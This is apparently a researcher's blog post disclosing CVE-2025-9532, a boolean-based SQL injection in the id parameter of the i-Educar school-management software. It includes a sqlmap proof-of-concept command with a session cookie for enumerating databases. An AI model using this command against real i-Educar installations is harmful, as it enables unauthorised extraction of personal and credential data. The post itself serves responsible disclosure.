CVE-2025-9532 CVE-2025-9532

CVE-2025-9532

Introduction

While exploring i-Educar, I identified a serious Boolean-Based SQL Injection flaw in the id parameter of the /module/RegraAvaliacao/view?id=[id] endpoint.

With the help of the tool sqlmap, it was possible to exploit the flaw and extract information directly from the database.


What is CVE-2025-9532?

The CVE-2025-9532 describes a SQL Injection flaw in the /module/RegraAvaliacao/view?id=[id] endpoint, where the id parameter is not properly validated.

Using Boolean techniques, it was possible to infer the database structure, access confidential data, and explore the backend without generating errors visible to the user.


Technical Details

» Vulnerable Endpoint: /module/RegraAvaliacao/view?id=[id]

» Affected Parameter: id


Proof of Concept (PoC)

To demonstrate the vulnerability, the following command was used:

Terminal window
sqlmap -u "http://localhost:8086/module/RegraAvaliacao/view?id=1" -p id --cookie="i_educar_session=qEk2wbjxS5IbECJGqnIa0dbmIyI3XIsXqm3WSh6K" \ --dbms=PostgreSQL --technique=B --dbs --batch

The sqlmap will automatically test the id parameter, and after a few minutes it will begin revealing the available databases, confirming the injection:

With the injection confirmed, it was also possible to list tables and columns with additional sqlmap commands, highlighting the potential for data exfiltration:

You can access the full technical report with all step-by-step evidence here:

CVE-2025-9532 Report


Impact

This SQL Injection vulnerability can be exploited to:

  • Access sensitive data stored in the database;
  • Enumerate database schemas, tables, and columns;
  • Modify, delete, or insert arbitrary records;
  • Steal user credentials and personal information;
  • Perform a denial of service (DoS) attack by triggering long query delays;
  • In some cases, escalate to Remote Code Execution (RCE).

Official Sources

This vulnerability was reported responsibly and is publicly registered as:


Credits

Discovered with💜 by Karina Gante.

LinkedInGitHubGmailInstagram

Official Member of CVE-Hunters🏹


← Back to blog